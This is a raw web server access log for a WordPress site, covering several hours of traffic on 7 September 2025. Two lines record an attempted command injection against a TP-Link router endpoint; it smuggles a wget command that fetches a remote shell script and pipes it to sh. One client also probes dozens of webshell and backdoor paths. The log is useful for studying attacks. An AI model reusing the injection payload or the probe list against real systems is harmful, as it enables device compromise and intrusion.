117.132.188.204 - - [07/Sep/2025:19:39:11 +0800] "GET /wp-content/uploads/revslider/slider-1/1750929639-yuanjing_Slider_3840%C3%972160_20250626171955-scaled.webp HTTP/1.1" 200 203290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
36.133.115.36 - - [07/Sep/2025:19:46:07 +0800] "POST /wp-cron.php?doing_wp_cron=1757245567.7232289314270019531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [07/Sep/2025:19:46:08 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [07/Sep/2025:20:00:04 +0800] "POST /wp-cron.php?doing_wp_cron=1757246404.4326770305633544921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.130.3.120 - - [07/Sep/2025:20:00:04 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.130.3.120 - - [07/Sep/2025:20:00:08 +0800] "GET / HTTP/1.1" 200 33467 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [07/Sep/2025:20:06:30 +0800] "POST /wp-cron.php?doing_wp_cron=1757246790.8267939090728759765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
162.243.208.127 - - [07/Sep/2025:20:06:30 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
162.243.208.127 - - [07/Sep/2025:20:06:32 +0800] "GET / HTTP/1.1" 200 39369 "http://36.133.115.36" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
36.133.115.36 - - [07/Sep/2025:20:12:00 +0800] "POST /wp-cron.php?doing_wp_cron=1757247120.2920830249786376953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
35.203.210.193 - - [07/Sep/2025:20:12:00 +0800] "GET /wp-login.php HTTP/1.1" 200 8672 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
121.167.125.180 - - [07/Sep/2025:20:24:01 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
121.167.125.180 - - [07/Sep/2025:20:24:01 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [07/Sep/2025:20:24:02 +0800] "POST /wp-cron.php?doing_wp_cron=1757247841.9858560562133789062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [07/Sep/2025:20:35:15 +0800] "POST /wp-cron.php?doing_wp_cron=1757248514.9623150825500488281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
178.128.101.163 - - [07/Sep/2025:20:35:15 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
178.128.101.163 - - [07/Sep/2025:20:35:15 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
152.42.193.183 - - [07/Sep/2025:20:35:17 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; Odin; https://docs.odin.io/)"
152.42.193.183 - - [07/Sep/2025:20:35:17 +0800] "GET / HTTP/1.1" 200 39369 "http://36.133.115.36" "Mozilla/5.0 (compatible; Odin; https://docs.odin.io/)"
52.167.144.225 - - [07/Sep/2025:20:39:12 +0800] "GET /wp-content/uploads/2025/07/1753453986-Article_images_W900px.webp HTTP/1.1" 200 57364 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [07/Sep/2025:20:39:31 +0800] "POST /wp-cron.php?doing_wp_cron=1757248771.0513360500335693359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
116.179.32.226 - - [07/Sep/2025:20:39:31 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2Fcontacts%2F HTTP/1.1" 200 1114 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [07/Sep/2025:20:45:40 +0800] "POST /wp-cron.php?doing_wp_cron=1757249140.5467920303344726562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [07/Sep/2025:20:45:57 +0800] "GET / HTTP/1.1" 200 109837 "-" "-"
42.236.12.215 - - [07/Sep/2025:20:56:59 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [07/Sep/2025:20:57:05 +0800] "POST /wp-cron.php?doing_wp_cron=1757249825.7660219669342041015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
42.236.12.215 - - [07/Sep/2025:20:57:05 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [07/Sep/2025:20:58:13 +0800] "POST /wp-cron.php?doing_wp_cron=1757249893.3502271175384521484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.4.97.180 - - [07/Sep/2025:20:58:13 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
121.4.97.180 - - [07/Sep/2025:20:58:18 +0800] "GET / HTTP/1.1" 200 33467 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
42.236.17.218 - - [07/Sep/2025:21:08:29 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [07/Sep/2025:21:08:33 +0800] "POST /wp-cron.php?doing_wp_cron=1757250513.3621370792388916015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
42.236.17.218 - - [07/Sep/2025:21:08:33 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [07/Sep/2025:21:10:33 +0800] "POST /wp-cron.php?doing_wp_cron=1757250633.5996088981628417968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.157.43.147 - - [07/Sep/2025:21:10:33 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.157.43.147 - - [07/Sep/2025:21:10:35 +0800] "GET / HTTP/1.1" 200 33468 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [07/Sep/2025:21:23:32 +0800] "POST /wp-cron.php?doing_wp_cron=1757251412.2623438835144042968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
178.128.207.2 - - [07/Sep/2025:21:23:32 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
52.178.161.109 - - [07/Sep/2025:21:33:53 +0800] "GET /gmo.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:33:54 +0800] "GET /elp.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:33:54 +0800] "GET /aa.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:33:54 +0800] "GET /file.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:33:54 +0800] "GET /wp-file.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:33:55 +0800] "GET /k.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:33:55 +0800] "GET /al.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [07/Sep/2025:21:33:56 +0800] "POST /wp-cron.php?doing_wp_cron=1757252036.2076210975646972656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
52.178.161.109 - - [07/Sep/2025:21:33:56 +0800] "GET /wp- HTTP/1.1" 404 31381 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:33:56 +0800] "GET /admin.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:33:57 +0800] "GET /file2.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:33:57 +0800] "GET /as.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:33:57 +0800] "GET /f35.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:33:57 +0800] "GET /akc.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:33:57 +0800] "GET /chosen.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:33:58 +0800] "GET /classsmtps.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:33:58 +0800] "GET /classwithtostring.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:33:58 +0800] "GET /dropdown.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:33:58 +0800] "GET /cong.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:33:59 +0800] "GET /about.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:33:59 +0800] "GET /browse.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:00 +0800] "GET /wp-signup.php HTTP/1.1" 302 5 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:01 +0800] "GET /wp-login.php?action=register HTTP/1.1" 302 5 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:02 +0800] "GET /wp-login.php?registration=disabled HTTP/1.1" 200 8853 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:02 +0800] "GET /assets/atomlib.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:02 +0800] "GET /atomlib.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:02 +0800] "GET /autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:03 +0800] "GET /autoload_classmap/function.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:03 +0800] "GET /cgi-bin/xmrlpc.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:03 +0800] "GET /cgi-bin/file.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:03 +0800] "GET /backup.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:04 +0800] "GET /cache.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:04 +0800] "GET /cc.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:04 +0800] "GET /fw.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:04 +0800] "GET /gebase.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:05 +0800] "GET /makeasmtp.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:05 +0800] "GET /doc.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:05 +0800] "GET /e.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:05 +0800] "GET /f35.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:06 +0800] "GET /fi2.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:06 +0800] "GET /filemanager.php? HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:06 +0800] "GET /go.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:06 +0800] "GET /inputs.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:07 +0800] "GET /alfa.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:07 +0800] "GET /ioxi-o.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:07 +0800] "GET /item.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:07 +0800] "GET /jp.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:08 +0800] "GET /load.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:08 +0800] "GET /1.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:08 +0800] "GET /13.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:09 +0800] "GET /lv.php HTTP/1.1" 404 27 "-" "-"
45.135.193.100 - - [07/Sep/2025:21:34:09 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
52.178.161.109 - - [07/Sep/2025:21:34:09 +0800] "GET /default.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:09 +0800] "GET /manager.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:09 +0800] "GET /mar.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:09 +0800] "GET /moon.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:10 +0800] "GET /new.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:10 +0800] "GET /NewFile.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:10 +0800] "GET /past.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:11 +0800] "GET /randkeyword.PhP7 HTTP/1.1" 404 31381 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:12 +0800] "GET /shell.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:12 +0800] "GET /simple.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:13 +0800] "GET /cgi-bin/ HTTP/1.1" 404 31381 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:14 +0800] "GET /wp-trackback.php HTTP/1.1" 404 140 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:14 +0800] "GET /updates.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:14 +0800] "GET /403.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:14 +0800] "GET /x.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:15 +0800] "GET /y.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:15 +0800] "GET /wp-content/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:15 +0800] "GET /wp-includes/ID3/index.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:15 +0800] "GET /wp-admin/function.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:16 +0800] "GET /.well-known/acme-challenge/muse.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:16 +0800] "GET /.well-known/pki-validation/about.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:16 +0800] "GET /wp-content/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:16 +0800] "GET /wp-content/index.php HTTP/1.1" 200 5 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:17 +0800] "GET /wp-content/themes/about.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:17 +0800] "GET /wp-includes/Text/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:17 +0800] "GET /templates/protostar/index.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:17 +0800] "GET /wp-includes/pomo/wp-conflg.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:18 +0800] "GET /wp-admin/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:18 +0800] "GET /wp-includes/assets/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:18 +0800] "GET /wp-includes/style-engine/about.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:18 +0800] "GET /wp-includes/assets/index.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:19 +0800] "GET /wp-includes/bk/index.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:19 +0800] "GET /wp-includes/blocks/shortcode/index.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:19 +0800] "GET /wp-includes/css/dist/widgets/about.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:19 +0800] "GET /wp-includes/fonts/about.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:19 +0800] "GET /wp-includes/sitemaps/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:20 +0800] "GET /wp-admin/css/colors/blue/atomlib.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:20 +0800] "GET /wp-admin/js/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:20 +0800] "GET /wp-admin/includes/about.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:20 +0800] "GET /wp-includes/js/jcrop/Jcrop.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:21 +0800] "GET /wp-admin/js/index.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:21 +0800] "GET /wp-admin/js/wp-login.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:21 +0800] "GET /wp-admin/maint/index.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:21 +0800] "GET /wp-content/plugins/WordPressCore/cong.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:22 +0800] "GET /wp-content/admin.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:22 +0800] "GET /wp-content/plugins/index.php HTTP/1.1" 200 5 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:22 +0800] "GET /wp-content/plugins/wp-conflg.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:22 +0800] "GET /wp-content/index.php HTTP/1.1" 200 5 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:23 +0800] "GET /wp-content/themes/about.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:23 +0800] "GET /wp-content/themes/admin.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:23 +0800] "GET /wp-content/themes/index.php HTTP/1.1" 200 5 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:24 +0800] "GET /wp-content/themes/themes.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:24 +0800] "GET /wp-content/themes/twentytwentytwo/index.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:24 +0800] "GET /wp-content/upgrade/index.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:25 +0800] "GET /wp-content/uploads/de_fb_uploads/b.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:25 +0800] "GET /wp-content/uploads/index.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:25 +0800] "GET /wp-includes/SimplePie/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:25 +0800] "GET /wp-includes/IXR/admin.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:26 +0800] "GET /wp-includes/404.php HTTP/1.1" 404 27 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:26 +0800] "GET /wp-admin/css/colors/midnight/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:27 +0800] "GET /admin/uploads/ HTTP/1.1" 404 31381 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:28 +0800] "GET /.tmb/ HTTP/1.1" 404 31381 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:28 +0800] "GET /shop/ HTTP/1.1" 200 72307 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:30 +0800] "GET /wp-admin/ HTTP/1.1" 302 5 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:30 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 200 8672 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:31 +0800] "GET /wp-admin/css/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:31 +0800] "GET /wp-admin/css/colors/ectoplasm/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:31 +0800] "GET /wp-admin/js/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:31 +0800] "GET /wp-admin/js/widgets/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:32 +0800] "GET /wp-admin/maint/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:32 +0800] "GET /wp-content/ HTTP/1.1" 200 5 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:33 +0800] "GET /wp-content/mu-plugins-old/ HTTP/1.1" 404 31381 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:33 +0800] "GET /wp-content/themes/ HTTP/1.1" 200 5 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:33 +0800] "GET /wp-content/uploads/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:34 +0800] "GET /wp-includes/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:34 +0800] "GET /wp-includes/ID3/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:34 +0800] "GET /wp-includes/IXR/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:34 +0800] "GET /wp-includes/PHPMailer/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:35 +0800] "GET /wp-includes/Requests/Cookie/ HTTP/1.1" 404 31381 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:36 +0800] "GET /wp-includes/Requests/Response/ HTTP/1.1" 404 31381 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:37 +0800] "GET /wp-includes/SimplePie/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:37 +0800] "GET /wp-includes/Text/Diff/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:37 +0800] "GET /wp-includes/Text/Diff/Renderer/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:38 +0800] "GET /wp-includes/assets/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:38 +0800] "GET /wp-includes/block-bindings/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:38 +0800] "GET /wp-includes/certificates/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:38 +0800] "GET /wp-includes/css/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:39 +0800] "GET /wp-includes/customize/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:39 +0800] "GET /wp-includes/html-api/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:39 +0800] "GET /wp-includes/images/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:39 +0800] "GET /wp-includes/images/smilies/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:40 +0800] "GET /wp-includes/rest-api/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:40 +0800] "GET /wp-includes/rest-api/endpoints/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:40 +0800] "GET /wp-includes/rest-api/fields/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:40 +0800] "GET /wp-includes/rest-api/search/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:41 +0800] "GET /wp-includes/sitemaps/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:41 +0800] "GET /wp-includes/sitemaps/providers/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:41 +0800] "GET /wp-includes/sodium_compat/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:41 +0800] "GET /wp-includes/sodium_compat/src/ HTTP/1.1" 403 146 "-" "-"
52.178.161.109 - - [07/Sep/2025:21:34:41 +0800] "GET /wp-includes/style-engine/ HTTP/1.1" 403 146 "-" "-"
36.133.115.36 - - [07/Sep/2025:22:13:30 +0800] "POST /wp-cron.php?doing_wp_cron=1757254410.1206688880920410156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [07/Sep/2025:22:13:30 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [07/Sep/2025:22:15:59 +0800] "POST /wp-cron.php?doing_wp_cron=1757254559.2955939769744873046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
196.251.69.194 - - [07/Sep/2025:22:16:00 +0800] "GET / HTTP/1.0" 200 151897 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
